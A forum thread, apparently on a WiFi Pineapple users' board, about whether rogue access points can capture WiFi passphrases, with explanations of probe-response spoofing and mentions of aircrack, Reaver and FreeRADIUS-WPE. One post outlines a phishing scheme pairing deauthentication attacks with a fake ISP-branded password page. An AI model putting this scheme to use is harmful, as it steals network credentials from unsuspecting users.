Jump to content

Capturing Essid Credentials?


Recommended Posts

I haven't seen anything about this yet, but I just wanted to know if there is anything that'll capture the wifi network credentials.

Are they encrypted?

We're already the man-in-the-middle, so would this be difficult?

Hi Jonathan,

If you're asking to capture the shared passphrases used to authenticate users against an AP (WEP, WPA, etc..) then I don't think it's possible at all. Since you can "impersonate" those SSID, it really doesn't matter what encryption/authentication that SSID is using. Because you're actually saying: Yes, I'm that SSID!. So, people will connect to you automatically.

Hope I answered your question.

Cheers!

Link to comment
Share on other sites

If their OS decides to "fall back" to open, non-encrypted connection, that is true. But it is rare for OS now a days to do so. They would need an open, non-encrypted network saved to their device and then it would connect to the pineapple if set to auto-connect. You cannot impersonate a secure network due to how the handshaking works and validating the password in the handshaking process.

Link to comment
Share on other sites

This shouldn't be too difficult though. Basically aircrack provides this capability for WEP networks and the ability to capture the handshakes of WPA/WPA2 networks. What I would see is a module for capturing IVs (WEP) and Handshakes (WPA)then sending them to a remote host for processing.

You then have Reaver which exploits a vulnerability is WPS for WPA/WPA2 networks which is very effective just time consuming.

You should read over the documentation for aircrack and reaver to get a full understanding of what they are doing. Reaver from my understanding is installed on the Pineapple but does not function yet. I can not confirm the working status but I know it is installed.

Link to comment
Share on other sites

This shouldn't be too difficult though. Basically aircrack provides this capability for WEP networks and the ability to capture the handshakes of WPA/WPA2 networks. What I would see is a module for capturing IVs (WEP) and Handshakes (WPA)then sending them to a remote host for processing.

You then have Reaver which exploits a vulnerability is WPS for WPA/WPA2 networks which is very effective just time consuming.

You should read over the documentation for aircrack and reaver to get a full understanding of what they are doing. Reaver from my understanding is installed on the Pineapple but does not function yet. I can not confirm the working status but I know it is installed.

I think reaver is ssh/cli only currently. No fancy GUI for it yet.

Link to comment
Share on other sites

If their OS decides to "fall back" to open, non-encrypted connection, that is true. But it is rare for OS now a days to do so. They would need an open, non-encrypted network saved to their device and then it would connect to the pineapple if set to auto-connect. You cannot impersonate a secure network due to how the handshaking works and validating the password in the handshaking process.

Hmmm, I was at the Motorola AirDefence demo showing how easy it was to "impersonate" ANY wirelsess networks. The guy was using one of the first version of Fonera router/AP. I found myself connected to our 802.1x network SSID (WPA2 Enterprise/AES) at that very place.

Edited by niggizito
Link to comment
Share on other sites

Hmmm, I was at the Motorola AirDefence demo showing how easy it was to "impersonate" ANY wirelsess networks. The guy was using one of the first version of Fonera router/AP. I found myself connected to our 802.1x network SSID (WPA2 Enterprise/AES) at that very place.

The closest you could get would be to use Freedradius-wpe http://www.willhackforsushi.com/FreeRADIUS_WPE.html which runs a RADIUS server which automatically accepts any authentication offered it. You may be technically authenticated but you won't actually be able to send any traffic as the server won't know the actual credentials so won't be able to encrypt/decrypt the traffic.

Link to comment
Share on other sites

I have been thinking of one Social Engineering hack using the pineapple to gain the user creds of wifi networks.

My "theoretical" hack is:

Here, where I live, the cable company offers really cheap TV/internet packages, and I live in a student area of my town, so almost every wifi ssid is a variation of "***123456" with the cable company's name as part of the SSID. I have created a fake landing page with their logo, and a simple "Enter your wireless password in this field" - type box.

Then using mdk3/aireplay-ng, i deauth all clients on the network I want the password for, hopefully the computer connects to the pineapple, as I am now the available signal.

Using the phishing scripts, I would be able to get passwords of other users.

Social Engineering 101 with a little pineapple as garnish

Link to comment
Share on other sites

The closest you could get would be to use Freedradius-wpe http://www.willhackforsushi.com/FreeRADIUS_WPE.html which runs a RADIUS server which automatically accepts any authentication offered it. You may be technically authenticated but you won't actually be able to send any traffic as the server won't know the actual credentials so won't be able to encrypt/decrypt the traffic.

Hmm, yes, I found myself connected to our enterprise SSID. But I was so astonished so I didn't check the possibility to browse. So I can't say anything. And I do remember the guy showed us the FREERADIUS patch from Josh Wright. Well, I thought that Mark iv exploits management packets. Looks like I was wrong...or maybe partially :-)

Anyway, good discussion.

Link to comment
Share on other sites

The 'exploit' we use is that the client probe for us (management packets) and tell us what they are looking for, we just say yes, we are here, in the probe responses (also management packets).

As we don't know any credentials we can reply to requests for encrypted networks of any kind so the association phase completes successfully but then when the authentication starts things fail as we don't know the keys so can't understand what the other side is saying.

If you had a really fast machine, and a client who was sticking around, then you could potentially collect credentials using Josh's app and crack them then feed them back into the server so you could talk to the client. Possible, but not on a pineapple.

Link to comment
Share on other sites

The 'exploit' we use is that the client probe for us (management packets) and tell us what they are looking for, we just say yes, we are here, in the probe responses (also management packets).

As we don't know any credentials we can reply to requests for encrypted networks of any kind so the association phase completes successfully but then when the authentication starts things fail as we don't know the keys so can't understand what the other side is saying.

If you had a really fast machine, and a client who was sticking around, then you could potentially collect credentials using Josh's app and crack them then feed them back into the server so you could talk to the client. Possible, but not on a pineapple.

I don't think anyone has a machine that fast!

Link to comment
Share on other sites

It depends on how strong the password is and how long you have. If someone is on a flight and leaves their wifi on then you could have a few hours, that is plenty of time to crack it.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...